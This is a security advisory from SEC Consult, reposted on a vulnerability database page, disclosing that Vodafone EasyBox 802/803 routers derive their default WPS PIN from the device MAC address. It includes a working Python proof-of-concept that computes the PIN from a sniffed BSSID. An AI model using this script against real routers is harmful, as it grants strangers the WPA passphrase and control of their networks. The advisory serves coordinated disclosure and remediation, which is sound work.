Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Vodafone EasyBox Default WPS PIN Algorithm Weakness

🗓️ 06 Aug 2013 00:00:00Reported by S. ViehbockType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 62 Views

Vodafone EasyBox Default WPS PIN Algorithm Weakness on EasyBox 802 & EasyBox 80

Code
`SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >  
=======================================================================  
title: Vodafone EasyBox Default WPS PIN Algorithm Weakness  
product: EasyBox 802 & EasyBox 803  
vulnerable version: EasyBox 802 - all versions  
EasyBox 803 - Production date before August 2011  
fixed version: EasyBox 802 - no vendor patch available  
EasyBox 803 - Production date after August 2011  
impact: Critical  
homepage: http://www.vodafone.de  
found: 2012-12-01  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
-----------------------------  
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are  
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be  
accessed with the default WPS PIN (PIN External Registrar) printed on the back  
of the device.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The algorithm that generates the default WPS-PIN is entirely based on the MAC  
address (=BSSID) and serial number of the device. The serial number can be  
derived from the MAC address.  
  
An unauthenticated attacker within the range of the access point can capture  
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN  
for it. This PIN can then be used to retrieve the current access point  
configuration (including the WPA passphrase) or to change the configuration  
(SSID, encryption method, passphrase, ...) of the access point.  
  
An attacker can afterwards connect to the access point and perform malicious  
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients  
on the internal network, etc.  
  
  
Proof of concept:  
-----------------  
A script that implements the derivation algorithm has been developed:  
  
#!/usr/bin/env python  
import sys, re  
  
def gen_pin (mac_str, sn):  
mac_int = [int(x, 16) for x in mac_str]  
sn_int = [0]*5+[int(x) for x in sn[5:]]  
hpin = [0] * 7  
  
k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF  
k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF  
hpin[0] = k1 ^ sn_int[9];  
hpin[1] = k1 ^ sn_int[8];  
hpin[2] = k2 ^ mac_int[9];  
hpin[3] = k2 ^ mac_int[10];  
hpin[4] = mac_int[10] ^ sn_int[9];  
hpin[5] = mac_int[11] ^ sn_int[8];  
hpin[6] = k1 ^ sn_int[7];  
pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5],  
hpin[6]), 16) % 10000000  
  
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or  
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc  
accum = 0  
t = pin  
while (t):  
accum += 3 * (t % 10)  
t /= 10  
accum += t % 10  
t /= 10  
return '%i%i' % (pin, (10 - accum % 10) % 10)  
  
def main():  
if len(sys.argv) != 2:  
sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')  
  
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])  
if len(mac_str) != 12:  
sys.exit('check MAC format!\n')  
  
sn = 'R----%05i' % int(mac_str[8:12], 16)  
print 'derived serial number:', sn  
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],  
mac_str[9], sn[5], sn[9])  
print 'WPS pin:', gen_pin(mac_str, sn)  
  
if __name__ == "__main__":  
main()  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,  
both produced by Arcadyan/Astoria Networks. Other devices of this vendor  
(including EasyBox 903) might be affected as well. Vodafone did not provide  
any information on this.  
  
According to Vodafone / CERT-Bund, the following devices are vulnerable:  
EasyBox 802 - all versions  
EasyBox 803 - production date before August 2011  
  
  
Vendor contact timeline:  
------------------------  
2012-12-14: Contacting Vodafone via customer support.  
2013-01-09: Vodafone refers to [email protected].  
2013-01-10: Requesting encryption keys.  
2013-01-14: Vodafone provides encryption keys.  
2013-01-15: Sending advisory and proof of concept exploit via encrypted  
channel.  
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.  
2013-01-25: Automatic response: Out of office until 2013-02-24.  
2013-01-25: Requesting new contact person from [email protected]  
and [email protected].  
2013-01-28: Vodafone acknowledges receipt of advisory.  
2013-02-05: Vodafone confirms validity of provided information, gives  
information about some newer devices which are not affected,  
mentions that customers have already been notified to change  
"default passwords" (no details given).  
2013-02-21: Requesting information regarding affected products/product versions,  
clarification regarding "default passwords", URLs/communication  
channels used for mentioned notifications, ways for identifying  
vulnerable devices (end users), ...  
2013-03-13: Still no response - sending deadline dates  
2013-05-29: Contacting German CERT-Bund for further coordination in order to  
warn end users  
2013-08-05: Coordinated release of advisory with German CERT-Bund  
  
  
Solution:  
---------  
Vodafone does not provide a solution for the affected devices.  
  
  
Workaround:  
-----------  
Either change the WPS PIN or disable WPS entirely.  
SEC Consult could not confirm if WPS actually is disabled (as opposed to just  
not being advertised), so both changing the PIN and disabling WPS is  
recommended.  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Stefan Viehböck / @2013  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Aug 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
vodafone germanydefault wps pinmac addressbssidarcadyan/astoria networkswi-fi apaccess point configurationserial numberwpa passphraseman-in-the-middle attacksarp spoofing
62